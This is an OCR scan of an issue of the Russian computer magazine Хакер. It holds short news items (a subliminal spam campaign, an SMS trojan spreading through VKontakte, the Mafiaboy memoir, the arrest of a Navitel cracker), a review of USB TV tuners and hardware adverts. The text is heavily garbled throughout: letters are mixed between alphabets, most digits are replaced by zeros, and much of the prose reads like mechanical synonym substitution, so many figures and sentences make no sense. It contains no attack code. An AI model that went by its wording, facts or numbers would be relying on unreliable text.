млн. евро ежемесячно.     Гипно-спам     ке». На определённый моментавтор перевел толстяк на власть Ігіепсів опіу, дальновидно спрятав отлюбопытных очи совершенно старые журнал равно проиндексировав их спецтэгом, в надежде они невыгодный отображались пусть даже на  кэше Яндекса. Однако во единственном оставшемся публичным посте дьявол пишет, что такое? невиновен, хоть бы равным образом малограмотный собирается больше сие обсуждать. относительно к- Р-УЧри. И ч ірні «кіпі ш   і1"»м ішіі"і С а."чіы ф[ѵін* С‘-»рІЧ1Ч*г4 ХМІ"ЖТНШ. добы        I Р     и-. ік.м»."іэііі.< лг 0ВЭ4ЛП7 Г (31 Ч » ШяЗ і   Шлих, и.исіп нябшпікі да гели     ЦціІЧ , І      ИЙ. I ірі      Специалисты антивирусной лаборатории РапсІаІ_аЬ5 обнаружили ахти неприятную объект — спам-сообщение, во котором применяются методы воздействия держи подсо-  знание. Немного утешает, ась? методы, буде дозволительно в такой мере выразиться, старые равно добрые.  С первого взгляда рассылка выглядитобычной рекламой, правда, лубок неграмотный статична  — нате экране  со огромной скоростью сменяют дружище друга хорошо изображения. На трех изо них написано «Виу» («Купи»), В равнина зрения сия сборка находится токмо до  10-46 миллисекунд, круглым счетом что такое? ламер ажно никак не осознает, который то есть видит. Зато  подсознание, конечно, сие фиксирует. По данным РапОа ба Ьв, сие центральный сетной  прецеденте использованием таких технологий «зомби рования»! Эксперты здорово  обеспокоены происходящим, оттого вроде могут поехать вслед да некоторые люди попытки, зарабатывать  полненные сейчас несравнимо больше изящно, а значит, больше опасные. Почти нет слов во всех отношениях мире операция бери подсознание с помощью рекламы запрещено законом, же пользу кого  спамеров закон, во общем-то, безвыгодный писан. Выходит, все, что-то непостоянно могут порекомендо-  вать пользователям специалисты — никак не бросать ради антивирусы, фильтры контента да спама.     «Вконтакте» паки болеет   Малварь до этого времени чаще стали увеличивать сквозь социальные сети, равным образом сие не- эка — чай они набирают целое большую популярность, во волюм числе равно на России. Но маневренный троян та ким способом тиражируется впервые!   Активность нимало простенькогоТго]ап-5М5.02МЕ.Копоѵ.Ь обна-  ружили во Лаборатории «Касперского», на чьих базах спирт числится сызнова вместе с  весны текущего года. Создатели вредоносной программки просто-напросто модер-  низировали приспособление доставки почти социальную сеть«Вконтакте». Зайдя получай сайт, абонент получает с друга известие об акции, во рамках  которой ходят слухи дозволено нажить премия возьми отсчет своего сотового — с 000 по  555 рублей. Для сего предлагается скачать да назначить держи автомат ОАѴА-  программу. Вместо пополнения счета прибавление рассылаетЗМЗ получи и распишись 0  коротких номеров, каждое с которых целесообразно грубо 050 рублей. Периоди-  чески троянецтакже пытается заполучитьлогин да отзыв новой жертвы на дальнейшего самораспространения (используя подложный потомство  «Вконтакте»]. Отметим, ась? подобное прогресс событий на сфере мобиль-  ного малваря Каврегвку І_аЬ. прогнозировали пока что на середине года. Эта круг вредоносного ПО развивается архи активно, а социальные мережа  — чрезвычайно благодатная почва.      ► 012     ХАКЕР 01 /119/ 08           А Большой Брат как-никак следит     Старая ребячество равно милаша пугало всех параноиков,  выступающих сравнительно не без; чем социальных сетей (мол, безвыездно сие склад  данных ФСБ равно следовать нами следят], ушла малограмотный та ко контия на покромка света с  правды. Должников вперед будут разыскивать чрез и да и нет во  целом равным образом сайты «Одноклассники» да «Вконтакте» на частнос-  ти. Этим займется Московское отдел Федеральной  службы судебных приставов. Они будут навалить вследствие  социальные яма информацию об имуществе задолжавших  пользователей, а в свою очередь «напоминать» им насчёт долгах сквозь  означенные сайты. Ну, а  со основы 0009 годы вводить в курс дела в отношении  задолженностях станут единаче на 0М5. Нельзя малограмотный перечислить да по части том, что-нибудь на ближайшее эпоха ФССП начнет трактация из  операторами сотовой связи, на целях получения доступа ко  информации касательно счетах владельцевтелефонов. При необхо-  димости счета инда могут оказываться арестованы. Технический шаг вперед умереть и безграмотный встать всей своей красе.      Особенности тенетный рекламы   Сразу шпалеры новшеств образовался во сфере интернет-рекламы. Во-первых, товарищество боодіе добралась, наконец, поперед перспективной ниши онлай-  новых игр равным образом запустила бета-версию сервиса АсІВепве іп Оатев. Как не- замысловато разгадать с названия, сие одна с ветвей развития рекламной  службы Ѳоодіе АсІВепве, предлагающей релевантную рекламу. Пока целое хорошенького понемножку даваться на виде роликов, демонстрирующихся на пороге игрой, позже  прохождения стадий или — или но задним числом проигрыша. До внедрения непос-  редственно на игровые миры рукоделие неграмотный дошло. Во-вторых, социальная трал  МуВрасе дала стартование сервису МуАОв, ориентированному получи малых предпри-  нимателей да частных лиц. Легко определив на системе наступающий смета  рекламной компании (от 05 перед 00.000 долла ров], каждый индивидуальность сможет подобрать свою «целевую аудиторию», возле помощи системы НурегТагдебпд.  Она включаете себя с лишним 0 000 критериев отбора, основанных в инфор-  мации, опубликованной на профилях пользователей. Например, рекламу  увидяттольколюди изопределенной географическойточки планеты,  занесшие во горизонт «морские обезьянки». Ты, кстати, отнюдь не заносил?      В сЫепсІег   Удобство гклддыпястгя нт мучіочрй.               "Г"     НЙ^бого.полох^іиУЬ   і “ . 0 ЛИП 0 Д нмКіжЛ* [кізішѵѴНА   ѴдЯ -рззвы* * Мнебоѵъшс Ііе      рІ1~ Ч- “ у™-"   КпгДД ни, ѴКЛіОЧІІШ Ос^сжктя ЧГпН».   КдЙелн л киарііірс ггріібаллиКПГ ми сил.,   Канднй вл*М И Т тносмЛ *      КОМПЬЮТЕРНЫЕ. ДНСЕССУДРЫ И ПЕРИФЕРИЯ               Хакерское чтиво   В последнее период отсюда следует аспидски попсово сочинять мемуары. Занимаются сим все, кому  нелень, начиная ото голливудских звезд да заканчивая менеджерами среднего звена,  которые ваяют до невероятности «в стол». ІТ-андегаунд, очевидно, решил, что-нибудь дьявол вничью неграмотный хуже. О том, аюшки? биографическую книгу пишет неправдоподобный Кэвин Митник,  взломавший Пентагон равным образом отсидевший 0 годы из-за свое деяние, ясный путь поуже давно.  Теперь во полку хакеров- писателей прибыло — во вселенная вышли записки Майкла Калса, подо названием «Но\л/ 0 Сгаскеб Иге Іпіегпеі а псі ѴѴИу ІІ"зЗііІА Вгокеп» («Как пишущий эти строки взломал всемирная сеть равно почемуон прежде этих пор малограмотный работает»), написанные на соавторстве от журна-  листом Крэйгом Сильверманом. Кале известный около ником МайаЬоу равно знамен иттем, в чем дело? на 0000 году он, во возрасте 05 лет, совокупно от группой хакеров организовал 0о5-атаку получи и распишись полоса крупных сайтов, начиная СЫІМ, Атагоп.сот, еВау, УаИоо равным образом Е*ТгасІе Ріпапсіаі.  Влечение нескольких часов средства были недоступны, равно по части оценкам некоторых  аналитиков, лава обошлась прославленный экономике во $1 .2 млрд. Калса поймали равным образом  осудили. Он получил 0 месяцев колонии ради несовершеннолетних равным образом испытывающий период длительностью 0 год, умереть и неграмотный встать срок которого ему ограничили подступ ко интернету. Но сие происходило во далеком 0001 году. А без дальних слов повзрослевший хакер, переквали-  фицировавшийся во журналисты (Кале вел колонку по части компьютерной безопасности на  канадской газете), решил во красках описать миру в рассуждении своих похождениях.     Соо&іе научили прислушиваться   Компания Воодіеуже в одно красота время пыталась метнуть сервис, разнюхивающий крик  — назывался возлюбленный (Зоодіе Ѵоісе БеагсИ. Экспериментальная новинка позволяла разыскивать за телефону отличаются как небо и земля компании на пределах США. Тогда кое-что невыгодный задалось, равно  работу системы изрядно памяти свернули. Но идеже далеко не преуспели американцы, упрощенчество  придумалиукраинцы. Наши соседи написали безвозмездный плагин для Іпбегпеб Ехріогег подина названием Ѵоісе ЗеагсИ Ваг, скачать каковой дозволено сообразно адресѵ ѵоісе5еагсІіЬаг.  сот . Пока пакет понимаеттолько английскую речь, однако сие обещают на скором  времени поправить. Принцип аддона работы прост — произносим ключевое слово,  жмем кнопку«поиск», равным образом нас переадресует получи сайт ѵоісевеагспЬаг.со-п . идеже выводятся  результаты изо Соодіе. К чему та кая мудреность? Во-первых, сверху сайте висит реклама,  а каждая переадресация — сие показы, во-вторых, ась? снова поджидать ото проекта посвя-  щенного Биллу Гейсту? Нет, сие никак не шутка. Цитата, принадлежащая Билли, красуется для главной странице ресурса. Она гласит: «В МісгозоЙ считают, аюшки? от пятью планирование  голосовых поисковых запросов на интернете хорэ больше, нежели печатных». Утвержде-  ние, нужно заметить, кардинально здравое, ей-ей равным образом программка равным образом безвыгодный самая бесполезная.   Ломаешь? Ломай бесплатно!   Как известно, исключения только что подтверждают правила. Авторов  крэков ко различному софту, в качестве кого правило, отнюдь не удается ни вычислить, ни  поймать, ни, тем более, осудить. И вона стирание случилось — при-  чем, у нас, на России: сумели разыскать человека, взломавшего в летнее время  2008 популярную картографическую софтину«Навител навигатор».   Скорее всего, взломщик попался по поводу возраста — Сергею Победино-  ву сумме 0 0, а главное, по причине того, что, распространяя взломанную  программу после варезники да блоги, некто просил пожертвоватьлюбую  сумму в близкий ѴѴеЬтопеу-кошелек. Из-за взлома Навител, борода  российского рынка картографического ПО, потерял приблизительно 0 0% с  общего объема продаж. И хакера, подложившего компании такую  свинью, воистину искали. Учитывая, что-то график хватит за глаза  специфичная, а композитор пытался заслужить для крэке — нашли. Теперь  Побединова могут аж приковать куголовной ответственности, ежели и прежде ареста труд безграмотный дошло — Навител на срок разбирается из родителями  юного гения, очевидно, пытаясь наладить казус всем миром (а  вероятнее, штрафом).       ► 014     ХАКЕР 01 /119/ 08      МІСКО-ЗТАР? ІМТЕР?МАТЮЫАІ_     14 - 05 % поисковых запросов содержат непохожие ошибки да искажения.   Фильтруем торжок держи лету   МісгобоЙ славится тем, сколько то и дело патентует абсолютно  очевидные принадлежности равным образом засим зарабатывает в этом. Например, где-то было из клавишами «радеир» да «радесіоѵѵп», колесом мышки равно  двойным кликом. Число патентов, принадлежащих корпорации, сейчас искони исчисляется тысячами, итеперь ко ним добавился до сейте поры безраздельно — МісговоН получили свидетельство ради номером 0.437.290 получи техноло-  гию автоматической цензуры речи [АіЛотаІіс СепвогвЫр о( Аибіо  Оаіа Іог Вгоасісазі]. На телевидении равным образом радиовещание применение «затирания»  применяется всеобъемлюще равно давнёшенько — в качестве кого правило, возмещение нежелатель-  ного языкоблудие вставляется звук«пи-ип», тож формулировка неприхотливо иска-  жается. Удивить кого-либо анализом звукового потока во режиме  реального времени нонче в свою очередь сложно. Но замещать нежелатель-  ные пустозвонство непосредственно сверху лету до настоящий поры последняя стержень в колеснице далеко не пытался. В свежем патенте  значится нимало полоз интересная материал — нежелательные болтовня  предлагается безграмотный нетрудно отлавливать, однако механично заменить  другими, сильнее благозвучными. Остается всего только ухватиться обеими руками  тому, что-то на совершенстве порождать речь человека, исходя изо  его образца, однако до сейте поры малограмотный научились.      іппоѵаНоп шіШ :*     5ирр0г»     г:     ШЛЕМСЯ:     ОгеепРоѵѵег НідЬезІ ЕНісіепсу   I Г ) ХргеззСооІ 0.его Ыоізе     Соглашайтесь лишь только получи и распишись  лучшее!   Системные платы М5І серии Р45 обеспечивают  максимальную продуктивность по причине  использованию микросхем ЭгМОБ серверного класса.   Рабочая жар     Дискретные МОП-транзисторы     Р45 Оіатопсі     !С П/,1-.     Л *   " ч ^ * -х- • •     4 Поддержка процессоров Іпіеі Соге 0  со возможностью разгона Р5В сверх  2000 МГц   4 Поддержка памяти ООВЗ-2000  л Вторичный основа питания держи  микросхемах ИгМОВ  *■ Жидкостное охолаживание Сігси-Ріре   * Поддержка АТІ Сго55рігеХ   • Звуковая план Х-Рі РЮ Аисііо     ХАКЕР 01 /119/ 08     ѵѵѵѵѵѵ.тісгозіаг.ги       КИРИЛЛ АВРОРИН     УЗВ-ТЕЛЕВИЗОР     ТЕСТИРОВАНИЕ ВНЕШНИХ ТВ-ТЮНЕРОВ     Сегодня я порадуем тебя обзором да тестированием новейших ТѴ-тюнеров,  подключающихся согласно ІІЗВ.     етб-7 отдавать монтаж равно расположение внутреннего  ТВ-тюнера занимала давно часа времени. Программы с целью  просмотра радовали десятками багов, а мощности многих  процессоров никак не хватало ради обработки аналогового  сигнала — например, такие полезные функции, наравне Тіте $ЬНТ, могли тащить всего лишь самые мощные ЦП. Сейчастакой проблемы малограмотный сущес-  твует. Даже отечественный тестовый, далеко не самый большой нотбук быстро тянул всё-таки  предлагаемые современными ТВ-тюнерами функции. Но труд далеко не на этом. Главная проблема, во которой невыгодный помогут ажно самые крутые  процессоры равным образом гигабайты памяти — скудное суть современных  телеканалов! Во многих опросах интернет-пользователи отвечают, который примерно отнюдь не смотрятТВ. Возможно, сие равно обуславливает медленное раз- витье рынка ТВ-тюнеров. С разный стороны, коли смотришьтелевизор никак не постоянно, а ото случая ко случаю, в таком случае на хрен заваливать квартиру раз в год по обещанию используемым громоздким ящиком? Не прощели отвести ко  компьютеру маленькую коробочку?     И МЕТОДИКА ТЕСТИРОВАНИЯ   У нас отнюдь не оказалось рукой подать телеантенны, да исследования да мы от тобой проводили во квартире, используя ноутбук. Пусть спирт приметно слабее, нежели наши тестовые  стенды, да подтащить большой оболочка  со монитором во другую комнату было  затруднительно. В принципе, ради теста внешних ТВ-тюнеров вполнедоста- согласно правилам 0,5-гигагерцового Іпіеі Соге 0 Оио равно 0 Гб памяти.  Впроцессетестирования пишущий сии строки установили идущее во комплекте программное  обеспечение, только только лишь то, ась? было должен интересах настройки да просмотра  передач. Обычно на комплекте поставляется единаче избыток дополнитель-  ных утилит, так им внимания автор никак не уделял равно — где-то что сверху результаты теста  они бы невыгодный повлияли. Настраивались доступныетелеканэлы, оценивалось свойство изображения, дюжинность интерфейса утилиты, ее потенциал равно  функции самого ТВ-тюнера. Если ради вводные положения работы приходится был оустановить  три программы, изрядно утилит, патч равно пакет кодеков — такойтюнер ни за ась? на свете безвыгодный был в состоянии надергать хорошей оценки. Столь простое складка невыгодный следует состоять  сложным во настройке.      РЕДАКЦИЯ ВЫРАЖАЕТ БЛАГОДАРНОСТЬЗАПРЕДОСТАВЛЕННОЕНАТЕСТИРОВАНИЕ ОБОРУДОВАНИЕ КОМПАНИИ ОЛДИ ІѴѴѴѴѴѴ.ОЮІ.Ри.ТЕЛ.  (4951-221-1 011), МАГАЗИНУ Х-СОМ 0Н0Р (ѴѴѴѴѴѴ.ХС0М-5Н0Р.ІШ, (4951-799-9669), КОМПАНИИ АНТАРЕС (УУ^.АЫТЯЗ.ЯЦ, (4951-748-71 01).     ► 016     ХАКЕР 01 /119/ 08          т"еггигп     Список протестированного  оборудованияД     АѵегМесІіа АѵегТѴ ОѴІ Вох 0 080І  АѵегМесІіа НуЬгісІ НХ  ВеИоШегТѴ Іпіго  СотргоѴібеотаіеѴівіа ІІ2800Г  Сотрго Ѵібеотаіе Ѵівіа ІІ750Р  Ріппасіе РСТѴ РНуЬгісІ Рго Зііск      3500 руб.     ІТестовый стенд:     НоутбукАсегТгаѵеІтаіе 0292-933032Мп  Процессор: Іпіеі Соге 0 Эио 0500 МГц  Системная плата: Іпіеі ОМ965  Память, Мб: 0072 Мб ООР2 067 МГц  Видеоплата: Іпіеі 0МАХ31 00  Жесткий диск, Гб: 020 Гб, ВАТА  ОС: ѴѴІпсІоѵѵв ХР РгоІеввіопаІ.      АѵегМесІіа АѴегТѴ РѴІ  Вохіо8оі|   Технические характеристики^     Тип подключения: замкнутый ТВ-тюнер   Входы: аудио, 0 -ѴісІео, компонентный, композитный, йѴІ   Выходы: аудио, ѲѴІ   Функции: картинка-в-картинке, мультиэкран, регулятор выдержки времени календарь   Поддержка разрешений: 020р,ю8оі  Максимальное разрешение: 0920X1200  Формат видео: 0=3 , 0=4 , 0б:9,1б:10   Пульт Д/У: глотать     АѵегМесІіа НуЬгі сІ НХ|   Технические характеристики^     Тип подключения: смешанный ТѴ -тюнер  Входы: аудио, 0 -Ѵісіео, композитный   Выходы: в отлучке   Функции: картинка-в-картинке, мультиэкран, регулятор выдержки времени записи, теле-  текст, Ііте зЫИ   Поддержка разрешений: 020р, 0080І  Максимальное разрешение: 020x576  Формат видео: 0=3 , 06:9  Пульт Д/У: кушать     О О      Ключевая свойство свежей модели через старожила рынка ТВ-тюнеров,  компании АѵегМесІіа, — сие опора разрешения 0 080І. С небольшим  экраном ноутбука автор невыгодный смогли аттестовать всегда успехи технологии, да обладателям больших мониторов, определенно, понравится. ТВ-тю-  нер автономный: софт отсутствует, а вследствие этого невыгодный оценивается. Установка равным образом упорядочение быть помощи пульта дистанционного управления прошли минуя проблем. На корпусе ТВ-тюнера убирать до некоторой степени кнопок: переклю-  чение каналов, регулировка звука, подсоединение питания равным образом усиление  меню. Актуальность сих кнопок почти вопросом, где-то во вкусе глотать важнецкий  пульт Д/У. Кнемутакже никаких претензий — простите понятен, принимать весь  необходимые кнопки.   0   Заметный изъян у сего тюнера всего лишь нераздельно — нереальность верти-  кальной установки корпуса для столе. В горизонтальном положении спирт занимает порядком места. Здесь откровенно малограмотный помешала бы небольшая  пластиковая подставка.      «Таким обязан взяться ТВ-тюнер!» Именно сии сотрясение воздуха напрашиваются по прошествии тестирован ия компактного, а адски функционального девайса ото АѵегМесІіа. От момента установки маленького ІІ5В-ключа поперед основные принципы  просмотра все прошло всего делов мало-мальски минут. Фирменный софт ставит-  ся после считанные секунды (опытная АѵегМесІіа навострилась уделывать  стабильные, функциональные равно втоже момент простые на использовании  программы). Крохотный ТВ-тюнерлегко просканировал эфир, ес всегда доступные программы равным образом сохранил их во таблицу каналов. Каждый дозволено единовластно назвать, переназначить для другую цифру, отвести  ненужные. Меню редактирования каналов максимальноупрощено. Под  рукой постоянно основные функции программы просмотра. Даже прозелит свободно  сможет выехать всеми возможностями!   0   Явный недочет — не возбраняется отвести лишь только одну антенну: либотелевизи-  онную, либо радио. Собственно, на этом снедать своя логика: бедственно предста- свивать крошечный ІІ5В-ключ от большим счетом разъемов. Поэтому малограмотный получится задним числом просмотра ТВ вмиг вчинить быть настороже радио.     ХАКЕР 01 /119/ 08     ► 017          Те г пробег        2850 руб.     Ріппасіе РСТѴІ  НуЬгісІ Рго БіісТЛ   Технические характеристики^!     Тип подключения: поместный ТѴ -тюнер  Входы: КОМПОЗИТНЫЙ   Выходы: недостает   Функции: телетекст, Ііте зЫН  Поддержка разрешений: 020р, 0080І  Максимальное разрешение: 020x576  Формат видео: 0=3. 06:9  Пульт Д/У: снедать   ••••••••00      Определенно, сие самый стильный, сжатый равным образом повадный бери видимость внеш-  ний ІІ5В-тюнер. Мы примерно неграмотный сомневались, что такое? Ріппасіе, построитель  кучи профессиональных пакетов программ в целях работы от видео, спра-  вится из созданием утилиты чтобы просмотра сверху «отлично». Таки оказа-  лось. Софт, шкандыбающий на комплекте, инсталлируется безлишних проблем равным образом  вопросов, а десница самоё тянется для кнопке сканирования эфира. Все удобно, да функционал программы максимально широк. Как наша сестра ни старались, нам никак не посчастливилось выискать ни одного недочета во интерфейсе. Качество изображе-  ния — получай высочайшем уровне.   0   Разочаровало недостаток радио-функций. Пульт дистанционного  управления товар равно неудобен. Нам никак не нимало понятна причина, по мнению которой  компактные ТВ-тюнеры комплектуются мини-пультом. Ведь очевидно, в чем дело? миздрюшка безвыгодный короче вкруг себя взирать очами задница рядом помощи ноутбука на дороге, а на стационарныхусловиях переключать каналы да юстировать изображе-  ние куда ни на есть удобнее полноценным пультом Д/У.     Сотрго Ѵігіеотаі е Ѵізіа 0)28ооГ|   Технические характеристики^     Тип подключения: поместный ТѴ-тюнер  Входы: аудио, 0 -Ѵійео, композитный   Выходы: пропал   Функции: картинка-в-картинке, мультиэкран, регулятор выдержки времени записи, ііте   5ІІІІ1   Поддержка разрешений:720р,Ю8оі  Максимальное разрешение: 020x576  Формат видео: 0=3. 06:9  Пульт Д/У: глотать   ••••••0000      В принципе, сие почти не абсолютный по образу и подобию ІІВВ-тюнера АѵегМебіа НуЬгісІ  НХ. Модели идентичны потехническим характеристикам, набору  портов да своим функциональным возможностям. От модели АѵегМесІіа вничью никак не отличалось да характер изображения. У тюнера классная  цветопередача равно абсентеизм помех.   0   Идущая во комплекте конспект нам никак не понравилась. Установить ее нате стандартную версию ѴѴІпсІоѵѵвХР посчастливилось всего лишь со второго раза.  Пришлось отключитьѴѴІРІ-соединение из интернетом — на противном  случае набор заканчивалась ошибкой. Помимо базисный ошибаться  граммы пришлосьустанавливатьеще сколько-нибудь утилит. Самаутилита  просмотра временами отказывалась запускаться, выдавая ошибку. Ин-  терфейстакже невыгодный усердствовать удобный, кнопки на программе маленькие да безграмотный приёмом справедливо их назначение. Не куда понравился равно показной  ИК-порт, какой-никакой делать нечего вводить ко отдельному ІІ5В-порту. Во пора просмотра ТВ твой умная машина не ведь — не то компьютер потеряют вмиг неуд  ІІ5В-порта. Рациональным подходом сие несладко назвать.     ► 018     ХАКЕР 01 /119/ 08            Беспроводной  маршрутизатор 002.1 0 N   со встроенным  А08І.2+ модемом     ѴѴІ_-АМ604д   Беспроводной роутер от АБЗБ 0+ модемом равно коммутатором 0x10/"     05/.-Л/73   Высокоскоростной Іпіегпеі   у вы дома!      ѴѴЬбООд     Беспроводной роутер  со встроенным АБЗІ-2+ модемом,  коммутатором 0x10/100 равно 0 портами ІІЗВ2.0     ѴѴІ.-АМ602/4   Универсальный роутер   ^ не без; АБЗБ 0+ модемом   ’ * равным образом интерфейсами ІІЗВ и/или І_АЫ     • Быстрее, нежели согласно проводам!   Поддержка протокола 002.1 0 п ОгаЙ 0.0 (300Мбит/с),  полная исподняя соединимость из 002.1 0 Ь/д   • Упрощенная конфиги   автоопределение настроек А08!_ соединения  Вашего провайдера   • Совместное эксплуатация ІІ8В-устройств вделанный сервер печати равным образом сервер РТР/Ыпих ЗагпЬа   • Адаптирован интересах работы от российскими Іпіегпеі провайдерами   • Технология А8Ы8 АЮізк   позволяет образовать файловый сервер равным образом делает размен  файлами от вентерь простым равно доступным     Всемирная заклад 0 возраст     ѵѵѵѵѵѵ.азиз.ги     тми ш ш^ш   Горячая абрис А51І8: (495) 03-11-999 _ , от ..   Коек 0оіісі ■ Неагі ТоисНіпд     Партнеры: белокаменная (495): БЮРОКРАТ (495) 045-55-11; Коосіоо ТесЬпоІодіез (495) 056-17-31; ОЮІ (495) 02-11-111; ПИРИТ-Дистрибуция (495) 074-3210; ТРІШТѴ-ЕІ.ЕСТКОМІСЗ ѵѵѵѵѵѵ.ігі-еі.ги; Меіго СазН&Саггу ѵѵшшеіго-сс.ги; Мвидео ѵѵѵуѵѵ.тѵісіео.ги; Месііа Магкі  ѵіл/ѵѵѵ.тесііатагкі.ги; Техносила ѵѵѵѵѵѵ.ІесИпозіІа.пі; Эльдорадо ѵлотѵ.еИогасІо.ги; Белый Ветер - ЦИФРОВОЙ 030-30-30; ЮМ 0444-333; Неоторг 023-23-23; НИКС 074-33-33; Санрайз 042-80-70; СтартМастер 085-85-55; Формоза 034-21-64; Форум Компьютере 075-77-59; Ф-Центр 005-  64-47; Тепіоіб Огоир 080-6385; ТРК 042-47-29; Электрон-Сервис 037-44-99; НТ Компьютер 063-93-93; ІІЗИ Сотриіегз 075-82-02; АРКИС (499) 012-96-90; Х-СОМ 0-999-600; Компьютер Маркет 000-03-04.   С-Петербург (812): КЕЙ 074; Компьютерный Мир 033-00-33; АІІКА Компьютеры 025-69-20; «N3 016-13-60; ТК-плюс 033-15-45; РИК - Компьютере 027-34-10.   Архангельск: Норланд (8182) 06-90-10; Белгород: Элси (4722) 05-86-11 ; Воронеж: РЕТ (4732) 07-93-39; Владивосток: ЭИЗ (4232) 000-454; Екатеринбург: Трилайн (343) 078-70-70, Белый Ветер Свердловск (343) 091-10-00, НТ Компьютер (343) 079-31-68; Жуковский: Байт (248) 0-  41-38; Иркутск: Комтек-Компьютерз (3952) 058-338; Краснодар: Владос (861)210-10-01; Красноярск: Старком (3912)49-11-11; Махачкала: Фирма АС (8722) 08-06-05; Мурманск: Мега Импекс (81 02) 077-477; Нижний Новгород: ЮСТ (831)225-28-23; Новокузнецк: Титан (3843) 00-38-  38; Новосибирск: ЗЕТ НСК (383) 046-4842, Техносити (383) 012-53-33, НТ Компьютер (383) 044-99-04; Омск: Компьюмаркет РИТМ (3812) 03-05-05; Петрозаводск: Компания «Р1 » (8142) 081-323; Пермь: НТ Компьютер (342) 037-15-73; Псков: Все интересах ПК (8112) 02-72-75; Ростов-на-  Дону: Иманго (863) 032-47-1 0, НТ Компьютер (863) 095-30-20; Солнечногорск: Компьютерный общество (469-26) 0-87-69; Сургут: Компьютерный универсам «Первый»; Томск: ИНТАНТ (3822) 06-00-56; Тюмень: Техносити (3452) 06-1 0-72; Уфа: Форте ВД (347) 060-00-00, Кламас (347) 091 -  21-12; Ярославль: Сеть компьютерных салонов «Фронтекс» (4852) 08-58-58.     Те-ггигп      ізіа ІІ750Р     3200 руб.     1900 руб.     [Технические характеристики     Тип подключения: чужой ТВ-тюнер  Входы: аудио, аудио, 0-ѴісІео, композитный  Выходы: аудио, РѴІ   Функции : картинка-в-картинке, мулыиэкран, регулятор выдержки времени записи, Тіте  5ЫИ   Поддержка разрешений: 020р, 0080І  Максимальное разрешение: 020x576  Форматвидео: 0=3  Пульт Д/У: глотать     ВеИоШегТѴІпІгоІ   Технические характеристики:!     Тип подключения: изолированный ТВ-тюнер  Входы : аудио, 0-ѴісІео, композитный, Ѵ6А  Выходы: аудио, ѴСА   Функции : мульти-экран, лубок для рабочем столе   Поддержка разрешений: 020р, 0 0801, 0 о8ор  Максимальное разрешение: 0920X1200   Формат видео: 0=3, 06:9, 06:10   Пульт Д/У: убирать     О О     О      Удачный показной ІІ5В-тюнер отСогпгро. На минута написания сих  строк модельтолько начатки представать на продаже, а плата кардинально  конкурентоспособна — всего делов 0900 рублей. Несмотря получи это, новинка  сохраняет функционал своих «коллег». Тюнер характеризует великолеп-  ное характер изображения да полное недостаток помех. Весьма благодатно равным образом существование отдельных входов в целях ТВ да радиоантенн. Тюнерзаключен во тщательный пластмассовый остов синего цвета. Размеры его невелики, определить позволительно что набок, приблизительно да вертикально. Или позволяется подшить для  задней стенке монитора. Отличный пульт Д/У — оченьтонкий, а вместе с боль-  шим в количестве функциональных клавиш! Также заявлена полная совмес-  тимость от ѴѴіпсІоѵѵ5 Мебіа Сепіег. во   Нам малограмотный весть понравилось программное обеспечение. Еслиты решишь завоевать эту модель, всенепременно пойди программы с сторонних  производителей.      Перед нами до нынешний поры одиночный обособленный дескать вайе, в эту пору — ото компании  Вебоібег, в меньшей степени известной, нежели АѵегМебіа, нотоже собаку съевшей возьми  производстве ТВ-тюнеро в. Первый положительный момент да явное различие через моде-  ли АѵегМебіа — сие выполнимость вертикальной установки корпуса  тюнера. Оченьудобно:устройствозанимаетминимум места, дозволяется инда подшить сверху стену. На самом корпусе расположены мало-мальски  управляющих клавиш, же во процессе тестирования мыиминепользо-  вались — пульт Д/У стократ удобнее.   0   Не ужас понравился соединение — онпоскрипываетине выглядит, как бы  дорогое устройство. Расстроило равно за глаза ОѴІ-выходов, снедать всего лишь  устаревшие 0-511 В. Кроме того, во комплекте недостает переходника не без; 0-5 II В сверху ОѴІ. Владельцам современных мониторов придется делать закупки его  отдельно. Приятного во этом мало.     г ВЫВОДЫ   Все исследованные нами модели продемонстрировали отличное характер  передачи ТВ-сигнала равным образом фактически полное безденежье помех. Прогресс  налицо. Несколько парение обратно та кое был по отношению к тому дело идет только лишь рядом использо-  вании лучших равным образом дорогих моделей. Сейчас даже если дешевые варианты радуют очи современным телевидением. С учетом оценки качества идущего на  комплекте программного обеспечения, первостепенный суперприз редакции получает  АѵегМесІіа НуЬгісІ НХ — многофункциональный, краткий равным образом укромный на работе ІІ5В-тюнер. Когда-то программное предоставление АѵегМесІіа  страдало валом недоработок, тем не менее вслед за прожитое сезон оно следовательно  лучшим сверху рынке. Уровню модели, в качестве кого правило, соответствует да ее цена.  Поэтому «Луч шую покупку» автор вручаем Сотрго Ѵібеотаіе Ѵізіа ІІ750Р.  ЭтотТВ-тюнер предлагает ради минимальную значимость отличное пошив да неплохие возможности. Конечно, оценку что есть мочи снижает неудачное  программное обеспечение, но, сэкономив держи цене, дальше основательно дозволяется истратить час-другой получи и распишись разглядывание ПО пт сторонних разработчиков - » -     ► 020     ХАКЕР 01 /119/ 08       АИТИ МЕНЮ        Компьютерные: деликатесы     вс "% на 00 а к"г"отб"р«ых   компьютерных деликатесов     5І0Ѳ “     Четыре ядра.   Вне конкуренции     щ        Тег пробег     Новинки     г         НРНБХ   Ні§1і-епс1 ноутбуки ради мобильных  развлечений     Играть во свежие гамесы, воззриться Риіі Нй видео, восторгаться чистым  многоканальным звуком — нравится всем. Но невозможноже повсеместно тас-  катьза из себя компьютер! Компания НРэто понимаети прямо того  выпустила семейные мощных ноутбуков НР НБХ, отдельный изо которых  послужит отличным центром развлечений равно нетрудно мощным равным образом удобным  портативным компом.   Благодаря красивому титановому корпусу да яркому экрану Вгід НбѴіеѵѵ  Іпііпііу Бізріау не без; диагональю 06- либо 08.4-дюймов сии мощные развле-  кательные ноутбуки станут отличными подарками ко надвигающимся  праздникам. Ноуты заряжены по части полной: допрос Віи-Рау, вделанный  ТѴ-тюнер, акустическая концепция АИес Бапвіпд® со встроенным сабву-  фером, видеокарта МѴЮІАбеРогсе 0600М 0Т. А дисплей оборудован бигеминальный лампой подсветки, в чем дело? позволитлегко сидеть  со ноутом даже если рядом ярком свете.     НР ТоисЬЗтаН: І<2500  Новый видеомагнитофон из сенсорным дисплеем     ТоисЬВтагІ — сие та ко называемый моноблоке сенсорным дисплеем.  Грубо говоря, сие монитор, во какой-никакой напихали безвыездно печенки через ком-  пьютера равным образом добавили сенсорную панель. Второе поколениеТоисбВтагІ  Ю500 было представлено до этих пор во июле, однако официальные поставки на  Россию начались нисколько недавно.   Новые моноблоки оснащаются процессорами Соге 0 ОиоТ5750 (5850)  со  частотами 0 (2,1 0) ГГц равно графической картой Іпбеі ѲМАХ31 00 либо ЫѴЮІА  ВеРогсе 0300М 05. Независимо с модификации моноблоки 